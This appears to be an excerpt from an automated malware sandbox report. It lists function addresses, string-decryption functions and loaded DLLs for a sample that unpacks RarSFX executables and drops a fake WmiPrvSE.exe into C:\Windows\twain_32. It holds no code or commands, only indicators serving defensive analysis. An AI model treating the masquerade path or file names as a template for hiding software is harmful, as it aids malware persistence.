Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8FCCC	0_2_00B8FCCC
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B97DDC	0_2_00B97DDC
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B82EB6	0_2_00B82EB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009E92C6	3_2_009E92C6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F5011	3_2_009F5011
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A062A8	3_2_00A062A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F5282	3_2_009F5282
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F02F7	3_2_009F02F7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F8253	3_2_009F8253
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F13FD	3_2_009F13FD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A064D7	3_2_00A064D7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F742E	3_2_009F742E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F55B0	3_2_009F55B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A0E600	3_2_00A0E600
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F07A7	3_2_009F07A7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F88AF	3_2_009F88AF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009ED833	3_2_009ED833
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009E395A	3_2_009E395A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A0EAAE	3_2_00A0EAAE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009E4A8E	3_2_009E4A8E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A12BB4	3_2_00A12BB4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009EFCCC	3_2_009EFCCC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009F7DDC	3_2_009F7DDC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009E2EB6	3_2_009E2EB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0561	4_2_00007FFD9B8A0561
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0598	4_2_00007FFD9B8A0598
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0588	4_2_00007FFD9B8A0588
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0590	4_2_00007FFD9B8A0590
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0518	4_2_00007FFD9B8A0518
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A04F8	4_2_00007FFD9B8A04F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8A0550	4_2_00007FFD9B8A0550
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8ADA70	4_2_00007FFD9B8ADA70
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Code function: 4_2_00007FFD9B8B1C90	4_2_00007FFD9B8B1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0598	9_2_00007FFD9BAA0598
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0588	9_2_00007FFD9BAA0588
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0561	9_2_00007FFD9BAA0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0590	9_2_00007FFD9BAA0590
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0518	9_2_00007FFD9BAA0518
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA04F8	9_2_00007FFD9BAA04F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAA0550	9_2_00007FFD9BAA0550
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAB1C90	9_2_00007FFD9BAB1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BAADA70	9_2_00007FFD9BAADA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BBF30C4	9_2_00007FFD9BBF30C4
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BCE3608	9_2_00007FFD9BCE3608
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 9_2_00007FFD9BCE2E88	9_2_00007FFD9BCE2E88
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0598	15_2_00007FFD9BAD0598
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0588	15_2_00007FFD9BAD0588
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0561	15_2_00007FFD9BAD0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0590	15_2_00007FFD9BAD0590
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0518	15_2_00007FFD9BAD0518
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD04F8	15_2_00007FFD9BAD04F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAD0550	15_2_00007FFD9BAD0550
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BAE1C90	15_2_00007FFD9BAE1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BADDA70	15_2_00007FFD9BADDA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BD1357A	15_2_00007FFD9BD1357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 15_2_00007FFD9BD12DFD	15_2_00007FFD9BD12DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0598	22_2_00007FFD9BAB0598
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0588	22_2_00007FFD9BAB0588
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0561	22_2_00007FFD9BAB0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0590	22_2_00007FFD9BAB0590
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0518	22_2_00007FFD9BAB0518
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB04F8	22_2_00007FFD9BAB04F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAB0550	22_2_00007FFD9BAB0550
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BAC1C90	22_2_00007FFD9BAC1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BABDA70	22_2_00007FFD9BABDA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BC030C4	22_2_00007FFD9BC030C4
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BCF357A	22_2_00007FFD9BCF357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 22_2_00007FFD9BCF2DFD	22_2_00007FFD9BCF2DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAA0530	27_2_00007FFD9BAA0530
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAA0561	27_2_00007FFD9BAA0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAADA70	27_2_00007FFD9BAADA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAB45F0	27_2_00007FFD9BAB45F0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAB88DD	27_2_00007FFD9BAB88DD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAB3010	27_2_00007FFD9BAB3010
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAB39BC	27_2_00007FFD9BAB39BC
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC33EE	27_2_00007FFD9BAC33EE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC0041	27_2_00007FFD9BAC0041
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC4138	27_2_00007FFD9BAC4138
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC0A88	27_2_00007FFD9BAC0A88
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BAC18CB	27_2_00007FFD9BAC18CB
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BACD418	27_2_00007FFD9BACD418
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BACCB91	27_2_00007FFD9BACCB91
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BACB651	27_2_00007FFD9BACB651
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BCE357A	27_2_00007FFD9BCE357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 27_2_00007FFD9BCE2DFD	27_2_00007FFD9BCE2DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0598	32_2_00007FFD9BAC0598
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0588	32_2_00007FFD9BAC0588
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0561	32_2_00007FFD9BAC0561
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0590	32_2_00007FFD9BAC0590
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0518	32_2_00007FFD9BAC0518
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC04F8	32_2_00007FFD9BAC04F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0550	32_2_00007FFD9BAC0550
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAD1C90	32_2_00007FFD9BAD1C90
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BACDA70	32_2_00007FFD9BACDA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BD0357A	32_2_00007FFD9BD0357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 32_2_00007FFD9BD02DFD	32_2_00007FFD9BD02DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD33EE	37_2_00007FFD9BAD33EE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD0041	37_2_00007FFD9BAD0041
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD4138	37_2_00007FFD9BAD4138
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD0A88	37_2_00007FFD9BAD0A88
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAD18CB	37_2_00007FFD9BAD18CB
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BADD3C0	37_2_00007FFD9BADD3C0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BADCB91	37_2_00007FFD9BADCB91
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BADB651	37_2_00007FFD9BADB651
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAFAA9F	37_2_00007FFD9BAFAA9F
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB27A4	37_2_00007FFD9BAB27A4
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB05A0	37_2_00007FFD9BAB05A0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB8909	37_2_00007FFD9BAB8909
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB0530	37_2_00007FFD9BAB0530
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7011	37_2_00007FFD9BAB7011
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB47F3	37_2_00007FFD9BAB47F3
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2FEA	37_2_00007FFD9BAB2FEA
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB43E3	37_2_00007FFD9BAB43E3
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7C57	37_2_00007FFD9BAB7C57
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB6048	37_2_00007FFD9BAB6048
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB542E	37_2_00007FFD9BAB542E
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB441E	37_2_00007FFD9BAB441E
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7776	37_2_00007FFD9BAB7776
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB6BDC	37_2_00007FFD9BAB6BDC
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB3BD9	37_2_00007FFD9BAB3BD9
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB57BE	37_2_00007FFD9BAB57BE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABA7AE	37_2_00007FFD9BABA7AE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2BA8	37_2_00007FFD9BAB2BA8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB4BA6	37_2_00007FFD9BAB4BA6
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB8F0E	37_2_00007FFD9BAB8F0E
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7F4F	37_2_00007FFD9BAB7F4F
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABA748	37_2_00007FFD9BABA748
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB3F39	37_2_00007FFD9BAB3F39
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB4E81	37_2_00007FFD9BAB4E81
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABDA70	37_2_00007FFD9BABDA70
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7270	37_2_00007FFD9BAB7270
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2665	37_2_00007FFD9BAB2665
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC1ADC	37_2_00007FFD9BAC1ADC
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2EAE	37_2_00007FFD9BAB2EAE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB121A	37_2_00007FFD9BAB121A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABA1FA	37_2_00007FFD9BABA1FA
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB8DF2	37_2_00007FFD9BAB8DF2
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB3DE7	37_2_00007FFD9BAB3DE7
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB1E53	37_2_00007FFD9BAB1E53
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB4E44	37_2_00007FFD9BAB4E44
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB4A41	37_2_00007FFD9BAB4A41
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB922C	37_2_00007FFD9BAB922C
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB7597	37_2_00007FFD9BAB7597
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB1D92	37_2_00007FFD9BAB1D92
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB6965	37_2_00007FFD9BAB6965
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB35C7	37_2_00007FFD9BAB35C7
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB19CB	37_2_00007FFD9BAB19CB
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB2D0F	37_2_00007FFD9BAB2D0F
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB90F8	37_2_00007FFD9BAB90F8
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB8D48	37_2_00007FFD9BAB8D48
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB993F	37_2_00007FFD9BAB993F
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABA48B	37_2_00007FFD9BABA48B
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB1479	37_2_00007FFD9BAB1479
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB9C6C	37_2_00007FFD9BAB9C6C
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BABC069	37_2_00007FFD9BABC069
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB5861	37_2_00007FFD9BAB5861
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAB68BE	37_2_00007FFD9BAB68BE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC45F0	37_2_00007FFD9BAC45F0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC88DD	37_2_00007FFD9BAC88DD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC3010	37_2_00007FFD9BAC3010
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BACC3FB	37_2_00007FFD9BACC3FB
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BAC39BC	37_2_00007FFD9BAC39BC
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BCF357A	37_2_00007FFD9BCF357A
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 37_2_00007FFD9BCF2DFD	37_2_00007FFD9BCF2DFD
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAC0A88	42_2_00007FFD9BAC0A88
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAC0041	42_2_00007FFD9BAC0041
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAB45F0	42_2_00007FFD9BAB45F0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAAB699	42_2_00007FFD9BAAB699
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAAC069	42_2_00007FFD9BAAC069
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BAC33EE	42_2_00007FFD9BAC33EE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BACB651	42_2_00007FFD9BACB651
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BACD544	42_2_00007FFD9BACD544
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 42_2_00007FFD9BBF30C4	42_2_00007FFD9BBF30C4
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BACD418	47_2_00007FFD9BACD418
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BACB651	47_2_00007FFD9BACB651
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BAB45F0	47_2_00007FFD9BAB45F0
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BAC33EE	47_2_00007FFD9BAC33EE
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 47_2_00007FFD9BBF30C4	47_2_00007FFD9BBF30C4

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: String function: 009FFFD0 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: String function: 009FFEFC appears 42 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: String function: 00A007A0 appears 31 times
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: String function: 00B9FEFC appears 42 times
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: String function: 00B9FFD0 appears 56 times
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: String function: 00BA07A0 appears 31 times

Tries to load missing DLLs

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
